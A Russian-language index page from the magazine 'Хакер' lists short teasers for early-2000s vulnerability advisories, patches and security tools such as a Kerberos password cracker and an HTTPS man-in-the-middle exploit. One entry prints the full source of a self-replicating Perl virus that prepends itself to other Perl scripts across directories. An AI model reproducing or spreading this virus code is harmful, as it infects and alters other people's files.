Переполнение буфера в xdvi и dvips
SuSE обнаружила уязвимость в библиотеке kpathsea (libkpathsea), которая используется xdvi и dvips. Обе программы небезопасно…
DoS против OSM модуля в Cisco
Optical Service Module (OSM) Line Cards, установленный на Catalyst 6500 или Cisco 7600 маршрутизаторах, работающих под Cisc…
Обход каталога в myServer
myServer – популярный Web сервер для Windows систем, написанный на С++. Планируется также перенос сервера на UNIX системы. …
Переполнение буфера при обработке PNG изображений в IE
Обнаружено две различные уязвимости в интерпретации PNG изображений в Microsoft Windows. Первая уязвимость связанна с обрабо…
The Bat! v1.62 Final
Ритлабс зафиналило "батник" - The Bat! v1.
Переполнение буфера через не исполнимый стэк в Windows
Атаки на переполнение буфера за последние 10 лет получили громадное распространение. Практически во всех современных операционных системах предусматривается защита от данных атак (Black Cat, Sun...). Поэтому не за горами то время, когда данная защита появится и у Windows систем
Патч для WM_TIMER
Microsoft выпустила патч, устраняющий проблемы с WM_TIMER (подробнее о уязвимости вы можете прочитать в двух наших статьях С…
Множественные уязвимости в apt-www-proxy
apt-www-proxy – прокси-сервер, специально разработанный для сбора http:// архивов. Программа собирает файлы, которые были за…
Уязвимость в FTP-клиентах
Многие FTP клиенты, включая те, которые встроены в Web клиенты, могут быть уязвимы к некоторым методам обхода каталога, кото…
Уязвимость в python
Уязвимость, обнаруженная в python от Zack Weinberg, связанна с неправильным использованием временных имен файлов в методе …
PortsLock 1.0
Уникальный файрвол, встраиваемый в Windows NT/2000/XP и позволяющий раздавать права пользователям на TCP/IP соединения. PortsLock позволяет определить, кто из пользователей достоин пользоваться HTTP, FTP, SMTP, POP3, Telnet и т.п., в какие дни и часы, с какими IP адресами может общаться и т.д
KerbCrack
KerbCrack состоит из двух программ: первая это сниффер слушающий сеть и перехватывающий Windows 2000/XP Kerberos логины, вторая - расшифровщик перехваченного, брутфорсом или по словарю.
mp3DirectCut 1.28
Маленькая утилитка для обработки МР3 файлов. Позволяет редактировать их прямо "на лету", вырезя из потока или СD песни только необходимые фрагменты.
DoS против Apple MacOS X
Mac OS X - BSD подобная операционная система от Apple Sofware.
Переполнение буфера в Enceladus Server Suite
Enceladus Server Suite - Web/FTP сервер для Windows, позволяющий безопасно организовывать общий доступ к файлам в сети. …
Переполнение буфера в PC-cillin
PC-cillin позволяет просматривать входящую электронную почту на наличие вирусов. Это достигается подключением локального поч…
Доступ к произвольному трафику в Netfilter/IPTables
Уязвимость в Netfilter/IPTables позволяет непривилегированному пользователю при определенных обстоятельствах читать ограниче…
Доступ к произвольным файлам в WebReflex
WebReflex - web-server, специально разработанный для использования на CD-ROM. Обнаруженная уязвимость позволяет удаленному а…
Неавторизованный доступ в APBoard
Уязвимость в APBoard позволяет неавторизованному пользователю читать сообщения внутреннего форума. Уязвимость связанна с нед…
Повышение привилегий
Повышение привилегий в системе - вечная тема для обсуждений. Сколько эксплоитов было сделано, сколько rootkit'ов было написано, и ради чего? Кодить, кодить, кодить... Дни и ночи напролет... Каждый пытается найти уязвимость, получить права рута, получить ВСЕ! Я не понимаю откуда берется это желание
DNS Hijacker
Программа, основанная на libnet/libpcap, которая может использоваться как сниффер или спуфер, а так же просто для учета трафика сети.
Уязвимость прокси в InterScan VirusWall
Встроенный в TrendMicro InterScan VirusWall прокси сервер позволяет коннектится к любому хосту внутри сети.
Локальный root в Exim (pid_file_path)
Уязвимость в Exim позволяет выполнять любые команды на сервере. Ошибку можно обнаружить в исходниках daemon.c:
ZoneAlarm Pro v3.5.166
Новая версия ZoneAlarm Pro v3.
Эксплоит для Cobalt RaQ4
Эксплоит позволяет получить root-привилегии на системе Cobalt RaQ 4 с установленным Security Hardening Рackage (SHP).
Множественные уязвимости в Ultimate PHP Board
Ultimate PHP Board - небольшой форум, написанный на PHP.
Межсайтовый скриптинг в SquirrelMail
SquirrelMail - webmail программа для Linux и Unix систем.
Межсайтовый скриптинг в разрешенных тэгах в phpBB2
phpBB - доска объявлений для UNIX и Windows систем.
SniffDet
Программа для анализа TCP/ IP сети с целью обнаружения сниффера.
Межсайтовый скриптинг в phpBB
phpBB - популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный …
Удаленное переполнение буфера в Cyrus IMAP Server
Cyrus IMAPD - бесплатный, с открытым исходным кодом IMAP демон для LINUX и UNIX систем. Пользователь, подключенный к демону,…
Несколько переполнений буфера в Cyrus Sieve/libSieve
В Sieve библиотеке в Cyrus IMAP сервере обнаружено несколько опасных уязвимостей: Передавая заголовок чрезмерной длин…
DoS и утечка информации в Apache/Tomcat
Jakarta Project создает и поддерживает открытые решения на Java платформе для последующего бесплатного распространения. Tomc…
Ставим и настраиваем IRC сервисы
Сегодня мы поговорим о настройке IRC-сервисов, причем эта тема будет освещаться со стороны администратора, то есть тебя =). Будучи юзером в IRC, ты быть может уже знаком с сервисами и знаешь почти все их команды, но, поверь, админом быть гораздо интереснее =)
Раскрытие информации о точке доступа в Windows XP
Обнаруженная уязвимость позволяет раскрыть список значений SSID, назначенных зарегистрированным точкам доступа и пакеты, заш…
Эксплоит WinSSLMiM
WinSSLMiM - эксплоит, реализующий нападение HTTPS "Man in the Middle". Программа содержит FakeCert, утилиту для со…
Патч для IE 5.5 и 6.0
Выпущена очередная заплата к Internet Explorer 5.5 и 6.0, которая содержит все предыдущие исправления к Internet Explorer и …
DoS против Outlook 2002
При работе с полученными почтовыми сообщениями Outlook обрабатывает информацию, содержащуюся в почтовом заголовке, которая с…
WifiScanner
Программа для обнаружения и анализа 802.
Вирус на Perl №2
В следующем исходнике дано решение данной проблемы: #!/usr/bin/perl # Perl - Get'em'all Virus open(File,$0); @Virus=<File>; @Virus=@Virus[0...46]; close(File); &InfectFile; if ($^0 =~ "MacOS") { chdir('::'); &InfectFile; } else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd`; chdir('..'); &InfectFile; chdir('C:\'); &SearchUpperDirectorys; chdir($OldDir);} else { $OldDir = `pwd`; chdir("/"); &SearchUpperDirectorys; chdir($OldDir);}} sub InfectFile { foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); }}}}} sub SearchUpperDirectorys { foreach $Directory (<*>) { if ((-r $Directory) && (-w &Directory ) && (-d $Directory) { chdir ($Directory); &InfectFile; chdir ('..') }}} OK, если мы в системе MacOS, то заражаем лишь низшую директорию
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
- доступ к платным материалам сайта
- доступ ко всем номерам PDF
4000 р.
на год
на год
920 р.
на месяц
на месяц
Материалы для подписчиков
Трюки
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире